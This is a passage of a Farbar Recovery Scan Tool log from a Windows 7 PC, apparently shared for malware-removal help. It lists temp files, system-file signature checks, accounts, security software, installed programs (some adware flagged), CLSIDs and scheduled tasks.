2015-12-13 08:14 - 2014-10-18 16:29 - 00000000 ____D C:\Users\Charlie\AppData\Local\Hewlett-Packard

==================== Files in the root of some directories =======

2014-11-16 23:26 - 2015-12-20 12:06 - 0003946 _____ () C:\Users\Charlie\AppData\Roaming\evpro32.prf

2014-10-18 19:36 - 2014-10-18 19:36 - 0000057 _____ () C:\ProgramData\Ament.ini

Some files in TEMP:

====================

C:\Users\Charlie\AppData\Local\Temp\COMAP.EXE

C:\Users\Charlie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmptas2yv.dll

C:\Users\Charlie\AppData\Local\Temp\Extract.exe

C:\Users\Charlie\AppData\Local\Temp\GURE7C7.exe

C:\Users\Charlie\AppData\Local\Temp\HPInstaller.exe

C:\Users\Charlie\AppData\Local\Temp\HPSFUpdater.exe

C:\Users\Charlie\AppData\Local\Temp\jre-8u45-windows-au.exe

C:\Users\Charlie\AppData\Local\Temp\jre-8u60-windows-au.exe

C:\Users\Charlie\AppData\Local\Temp\jre-8u65-windows-au.exe

C:\Users\Charlie\AppData\Local\Temp\jre-8u66-windows-au.exe

C:\Users\Charlie\AppData\Local\Temp\McCSPInstall.dll

C:\Users\Charlie\AppData\Local\Temp\mccspuninstall.exe

C:\Users\Charlie\AppData\Local\Temp\OfficeSetup.exe

C:\Users\Charlie\AppData\Local\Temp\SMARTProductUpdate.exe

C:\Users\Charlie\AppData\Local\Temp\SP67266.exe

C:\Users\Charlie\AppData\Local\Temp\SP67743.exe

C:\Users\Charlie\AppData\Local\Temp\SP68630.exe

C:\Users\Charlie\AppData\Local\Temp\SP70271.exe

C:\Users\Charlie\AppData\Local\Temp\UninstallHPSA.exe

C:\Users\Charlie\AppData\Local\Temp\{3C54AF03-11C0-41B9-91DC-5F5B17899C60}-41.0.2272.118_41.0.2272.101_chrome_updater.exe

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-01-09 01:47

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:09-01-2015

Ran by Charlie (2016-01-10 12:44:00)

Running from C:\Users\Charlie\Downloads

Windows 7 Professional Service Pack 1 (X64) (2014-10-18 21:26:59)

Boot Mode: Normal

==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1024156207-2972793060-2867319265-500 - Administrator - Disabled)

Charlie (S-1-5-21-1024156207-2972793060-2867319265-1000 - Administrator - Enabled) => C:\Users\Charlie

Guest (S-1-5-21-1024156207-2972793060-2867319265-501 - Limited - Disabled)

HomeGroupUser$ (S-1-5-21-1024156207-2972793060-2867319265-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Out of date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Out of date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)

Adobe Acrobat 5.0 (HKLM-x32\...\Adobe Acrobat 5.0) (Version: - )

Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.16 - Adobe Systems)

Adobe Digital Editions 4.0 (HKLM-x32\...\Adobe Digital Editions 4.0) (Version: 4.0.3 - Adobe Systems Incorporated)

Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.270 - Adobe Systems Incorporated)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)

Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)

Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)

ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden

Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden

Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

CameraHelperMsi (x32 Version: 13.31.1038.0 - Logitech) Hidden

Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden

CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.)

CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4102 - CyberLink Corp.)

CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4113 - CyberLink Corp.)

Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden

Dropbox (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Dropbox) (Version: 3.12.5 - Dropbox, Inc.)

Elevated Installer (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden

Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)

erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden

ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1ACF120-CD69-47F0-B202-9A4B95C436D8}) (Version: 5.1.5 - Hewlett-Packard)

ExamView ActiveX Control v2 (HKLM-x32\...\ExamView ActiveX Control v2) (Version: - )

ExamView Assessment Suite (HKLM-x32\...\ExamView Pro) (Version: - )

Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden

Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden

Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden

FromDocToPDF Internet Explorer Toolbar (HKLM-x32\...\FromDocToPDF_65bar Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION

Fusion Browser 1.265.1 (HKLM\...\{84A45CC4-5BE9-4EA9-9AD5-EEEC9F534F0D}_is1) (Version: 1.265.1 - Fusion Media)

Garmin Express (HKLM-x32\...\{714dc1e5-69a4-4ecd-9552-93397e084298}) (Version: 3.2.29.0 - Garmin Ltd or its subsidiaries)

Garmin Express (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden

Garmin Express Tray (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden

GCPlugin2 (HKLM-x32\...\{30420F05-0E15-4A3B-AE73-9E39ABA6CF5E}) (Version: 2.0.2.10 - GradeCam)

Get-a-Clip (HKLM-x32\...\Get-a-Clip) (Version: - Get-a-Clip)

Google Advertising Cookie Opt-out (HKLM\...\{A2E00B38-848D-4898-9109-BFA37C074DDC}) (Version: 1.0.1.0 - Google Inc)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)

Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden

GradeCam Plugin x64 (HKLM\...\{EEA6A66F-FC11-436C-B01B-9D2EC1D62CA5}) (Version: 2.0.2.10 - GradeCam Corporation)

GradeCam Plugin x86 (HKLM-x32\...\{D776F9D4-581E-4BF2-880F-E4E6ACD2A002}) (Version: 2.0.2.10 - GradeCam Corporation)

Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden

Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden

HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)

HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company)

HP Documentation (HKLM-x32\...\{9AB1B6EC-AEA4-4D78-ADDB-0291BF7230F4}) (Version: 1.1.0.0 - Hewlett-Packard)

HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)

HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)

HP Officejet Pro 8600 Basic Device Software (HKLM\...\{791A06E2-340F-43B0-8FAB-62D151339362}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)

HP Officejet Pro 8600 Help (HKLM-x32\...\{46235FF7-2CBE-4A84-BEDA-87348D1F7850}) (Version: 28.0.0 - Hewlett Packard)

HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)

HP Quick Launch (HKLM-x32\...\{6BA7C52E-4071-47CC-9060-ABB143862DB0}) (Version: 3.0.7 - Hewlett-Packard Company)

HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15430.4033 - Hewlett-Packard Company)

HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)

HP Software Framework (HKLM-x32\...\{DB97D0DE-0AA1-413C-8398-92C7FA3F4A67}) (Version: 4.6.13.1 - Hewlett-Packard Company)

HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)

HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)

HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)

HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden

I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)

Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden

Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden

Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)

Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3621 - Intel Corporation)

Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)

Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.4.40 - Intel Corporation)

Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)

Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)

Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden

Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden

John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden

LessonView (HKLM-x32\...\LessonView) (Version: - )

Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.0 - Logitech Inc.)

Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden

LWS VideoEffects (Version: 13.30.1379.0 - Logitech) Hidden

Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden

McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)

McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 14.0.6136 - McAfee, Inc.)

Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41105.0 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)

MSN (HKLM-x32\...\MSNINST) (Version: 11.50.0766.0 - Microsoft Corporation)

MSN Explorer Repair Tool (HKLM-x32\...\{3D36105D-D6C2-413A-9355-7370E8D9125B}) (Version: 11.50.0766.0 - Microsoft Corporation)

Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4779.1002 - Microsoft Corporation) Hidden

Office 15 Click-to-Run Licensing Component (Version: 15.0.4779.1002 - Microsoft Corporation) Hidden

Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4779.1002 - Microsoft Corporation) Hidden

One System Care (HKLM-x32\...\OneSystemCare) (Version: 2.10.10.0 - OneSystemCare) <==== ATTENTION

opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden

Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden

Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden

Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden

Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden

Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden

Prentice Hall Physical Science Interactive Textbook CD-ROM (HKLM-x32\...\{DFBEBE31-6C56-4B5F-88C2-FF827AFFDBC5}) (Version: 1.00.0000 - Prentice Hall)

Presenter version 3.0.4.5 (HKLM-x32\...\{73E8CFA8-F031-40B1-9129-C1247D178DCD}_is1) (Version: 3.0.4.5 - IPEVO Inc.)

Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications)

Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)

QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)

Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.49 - Realtek Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.85.423.2014 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7231 - Realtek Semiconductor Corp.)

RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden

ShopAtHome.com Helper (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\ShopAtHome.com Helper) (Version: 7.10.6.17 - ShopAtHome.com) <==== ATTENTION

ShopAtHome.com Toolbar (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\ShopAtHome.com Toolbar) (Version: 7.10.6.17 - ShopAtHome.com) <==== ATTENTION

SMART Common Files (HKLM-x32\...\{26A95DBF-A866-4838-A8C9-FA219FCBD22E}) (Version: 11.5.159.0 - SMART Technologies ULC)

SMART Ink (HKLM-x32\...\{5ABC49B5-D0DC-428D-A082-4AEFF6490F04}) (Version: 2.0.723.0 - SMART Technologies ULC)

SMART Notebook (HKLM-x32\...\{79660EE7-9C0B-4962-B566-2693FE34719D}) (Version: 11.4.564.0 - SMART Technologies ULC)

SMART Product Drivers (HKLM-x32\...\{53330A17-78DE-458E-9997-292A2D6D3ADD}) (Version: 11.4.872.1 - SMART Technologies ULC)

swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden

Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.16 - Synaptics Incorporated)

TeacherEXPRESS: Prentice Hall Physical Science (HKLM-x32\...\TeacherEXPRESS: Prentice Hall Physical Science) (Version: - )

Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden

Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden

Validity WBF DDK (HKLM\...\{21498212-1146-4540-8A81-6A1328BA19F2}) (Version: 4.5.228.0 - Validity Sensors, Inc.)

Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden

Web Companion (HKLM-x32\...\{2db81dda-4a3a-409a-95ee-35f5f1366180}) (Version: 2.1.1265.2535 - Lavasoft)

Web Updater version 1.0.24.0 (HKLM\...\{E440E2C7-6EA3-46E1-8991-FB53C40AEF5F}_is1) (Version: 1.0.24.0 - Web Updater)

WildTangent Games App (HP Games) (x32 Version: 4.0.5.36 - WildTangent) Hidden

Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)

Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)

Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{C6BDB9CB-5921-5A0D-ACED-D5F0EBCD92A1}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin64\npGCPlugin64_2.0.2.10.dll (GradeCam Corporation)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00532042-E325-4B5F-9A4B-C4BE2719C675} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-30] (Microsoft Corporation)

Task: {093A13B7-EA87-43B1-9C8E-E79B05EF77EA} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)

Task: {0C2051A4-532A-4C92-B62F-81876D901712} - System32\Tasks\Fusion Browser Update Task => Chrome.exe --sch-update

Task: {0DDEEAEA-10BF-4F5E-8430-AB9E61545ABE} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)

Task: {1112A124-C075-4683-90F5-18FF6FDA9D4C} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-30] (Dropbox, Inc.)

Task: {15065424-9F51-4275-88A4-4E8B13E41D9D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: {1694DD14-237E-4852-B696-048B86CC5641} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-30] (Microsoft Corporation)

Task: {2375DDF3-B77A-4ED8-B269-3EFBDE46F0D9} - System32\Tasks\HP AR Program Upload - bc22bb12ee95412ea8674f2ec7d9856afd78dd59bb164814bed5e8212d68ac07 => C:\Program Files\HP\HP Officejet Pro 8600\bin\HPRewards.exe [2012-10-17] (TODO: <Company name>)

Task: {2B43043C-FEC8-40FD-997D-4CCC366C2781} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)

Task: {2E9B0267-4BC2-4E0C-997E-CA602F06789B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2015-11-02] (McAfee, Inc.)

Task: {32BE05F2-95B0-4DB3-8FCB-70C777ECE174} - System32\Tasks\{9087FBD2-BE5A-4959-8427-E5A514D8FA8E} => pcalua.exe -a E:\Setup.exe -d E:\

Task: {33D0099D-EAA9-4CDF-B993-1E3E5B41D793} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2014-05-19] (Hewlett-Packard Development Company, L.P.)

Task: {40351BE5-BC97-494F-8470-20E8181B404D} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-08-04] (McAfee, Inc.)

Task: {43723026-9A3C-435B-9B1E-F9B16F6CB5F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)

Task: {47D87ACF-3A35-4E76-B65F-873DECC2E064} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: {4994821B-ED79-4D33-A90A-6EF9B1870A82} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-05-13] (CyberLink Corp.)

Task: {4CB0D980-A0AF-4ED7-994D-B8E7B27A5419} - System32\Tasks\McAfee\McAfee Idle Detection Task

Task: {4CB26727-2B66-44ED-9CB5-3BFE2BBD53F5} - System32\Tasks\{20EB2353-BC38-4995-9A61-A8D24A2C8361} => pcalua.exe -a C:\Users\Charlie\Downloads\chromeinstall-8u31.exe -d C:\Users\Charlie\Downloads

